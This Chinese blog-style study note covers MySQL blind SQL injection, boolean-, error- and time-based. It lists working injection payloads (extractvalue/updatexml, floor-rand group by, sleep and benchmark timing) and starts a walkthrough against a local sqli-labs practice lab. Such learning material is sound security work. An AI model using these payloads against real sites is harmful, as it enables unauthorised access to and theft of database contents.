本文为本人在学习中的总结,仅涉及基础的盲注技巧,可能多有疏漏之处,欢迎指教。
另外本人博客的SQL注入分类下有一些方面的详细讲解,在此只介绍简单的使用。
0x00、介绍一下本人对盲注的总结。
盲注就是在没有回显的结果下进行推断性的注入,这样我们有几种办法来注入:
1、根据页面正常与否判断payload是否正确(基于bool的盲注)
2、想办法让页面产生回显(个人感觉这个比较好用)(基于报错的盲注)
3、利用页面的延迟反应判断payload是否正确(基于延时的盲注)
0x01、盲注的大纲
1、布尔盲注
也就是上面说的根据页面是否正常来进行判断和注入。
1)字符串截取函数进行注入
了解一下会经常用到的MySQL字符串截取函数。
原理及简单应用参考:https://blog.csdn.net/zz_Caleb/article/details/86814043
2)regexp正则注入
原理及简单应用参考:https://blog.csdn.net/zz_Caleb/article/details/86814922
3)like匹配注入
例如:select user() like ‘ro%’
通配符 | 描述 |
---|---|
% | 替代一个或多个字符 |
_ | 仅替代一个字符 |
这三部分为bool盲注主要方法。
2、基于报错的盲注
想办法让页面产生回显
1)经典语句注入
select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a
select user()处就是语句作用的地方,将其换成我们简单注入是用的语句来获取回显内容。
以上语句可以简化成如下的形式。
select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))
注:若order by结果为三栏,select处应为select 1,2,count(*)
这里version()是语句作用点
2)exp()注入:利用double 数值类型溢出
原理参考:https://blog.csdn.net/zz_Caleb/article/details/86807364
3)bigint 溢出注入
原理参考:https://blog.csdn.net/zz_Caleb/article/details/86808589
4)extractvalue注入
用法:extractvalue(1,concat(0x7e,(select @@version),0x7e))
//mysql 对 xml 数据进行查询和修改的 xpath 函数,xpath 语法错误
5)updatexml注入
用法:updatexml(1,concat(0x7e,(select @@version),0x7e),1)
//mysql对xml数据进行查询和修改的 xpath 函数,xpath 语法错误
6)利用数据的重复性
用法:select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
//mysql 重复特性,此处重复了 version,所以报错
3、基于时间的盲注——延时注入
1)if+sleep()
一般用法:If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判断语句,条件为假,执行 sleep
Ps: 遇到以下这种利用 sleep()延时注入语句
select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.'));
该语句意思是在 0-9 之间找版本号的第一位。但是在我们实际渗透过程中,这种用法是不可取的,因为时间会有网速等其他因素的影响,所以会影响结果的判断。
2)if+benchmark()
UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘MSG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1;
//BENCHMARK(count,expr)用于测试函数的性能,参数一为次数,二为要执行的表达式。可以让函数执行若干次,返回结果比平时要长,通过时间长短的变化,判断语句是否执行成功。这是一种边信道攻击,在运行过程中占用大量的 cpu 资源。推荐使用sleep()函数进行注入。
小准备:
在讲解之前首先公布我们要找的东西吧,这样好有个对照。
根据基础的判断,id=1'--+返回正常。
order by:3个字段(username和password分别在第二三个字段)
database:security
group_concat(table_name separator '@'):emails@referers@uagents@users (我们用到users)
group_concat(column_name separator '@'):user_id@first_name@last_name@user@password@avatar@last_login@failed_login@id@username@password (我们用的是username和password)
提一下id=1'--+的判断吧:
id=1 and 1=2--+如果语句正常,则应返回一个错误页面,于是在id=1后面加符号进行判断,当id=1' and 1=2--+是页面错误。
0x02、进行bool盲注
主要是用substr()和mid(),个人认为这两个函数写脚本好些点。
首先暴库长:length()
http://127.0.0.1/sqli-labs/Less-5/?id=1%27%20and%20length(database())=8--+
此时页面正常,所以库长为8。次处用的=判断长度,用二分法判断时用大于小于号,效率更高。
注:本次脚本没写一个二分的,刚开始就想写点简单暴力的,尽量顺利点。